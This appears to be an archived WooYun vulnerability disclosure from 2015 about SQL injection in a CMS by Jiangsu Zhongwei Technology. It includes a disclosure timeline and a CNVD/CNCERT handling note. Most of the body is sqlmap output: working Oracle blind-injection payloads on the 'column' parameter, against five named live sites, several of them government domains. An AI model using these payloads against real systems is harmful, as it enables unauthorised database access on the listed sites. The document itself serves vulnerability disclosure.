乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-16: 细节已通知厂商并且等待厂商处理中 2015-04-21: 厂商已经确认,细节仅向厂商公开 2015-04-24: 细节向第三方安全合作伙伴开放 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
谷歌搜索:技术支持:江苏中威科技
案例一:http://cxsq.suqian.gov.cn/sqscms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: column (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 7751=DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(116)||CHR(76)||CHR(90),5) AND 'JyqW'='JyqW---web application technology: JSPback-end DBMS: Oracle
案例二:http://www.ntzb.cn:8083/cms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: column (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 5115=5115 AND 'YRdd'='YRdd Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 1431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(75)||CHR(76)||CHR(74),5) AND 'WOin'='WOin---web application technology: JSPback-end DBMS: Oracle
案例三:http://58.221.232.41/jslyqtkfq/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 124 HTTP(s) requests:---Parameter: column (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 1734=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(110)||CHR(83)||CHR(99),5) AND 'rzLr'='rzLr---web application technology: JSPback-end DBMS: Oracle
案例四:http://cxsy.siyang.gov.cn/syxcms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 124 HTTP(s) requests:---Parameter: column (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 9011=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(87)||CHR(103)||CHR(103),5) AND 'kCEL'='kCEL---web application technology: JSPback-end DBMS: Oracle
案例五:http://cxsh.sihong.gov.cn/shcms/show/protal_noticeContext.do?template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:---Parameter: column (GET) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: template=tpxw&pagesize=6&column=402880f830889db1013088cab8f80001' AND 2308=DBMS_PIPE.RECEIVE_MESSAGE(CHR(102)||CHR(67)||CHR(71)||CHR(81),5) AND 'tcAy'='tcAy---web application technology: JSPback-end DBMS: Oracle
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-04-21 11:06
CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。
暂无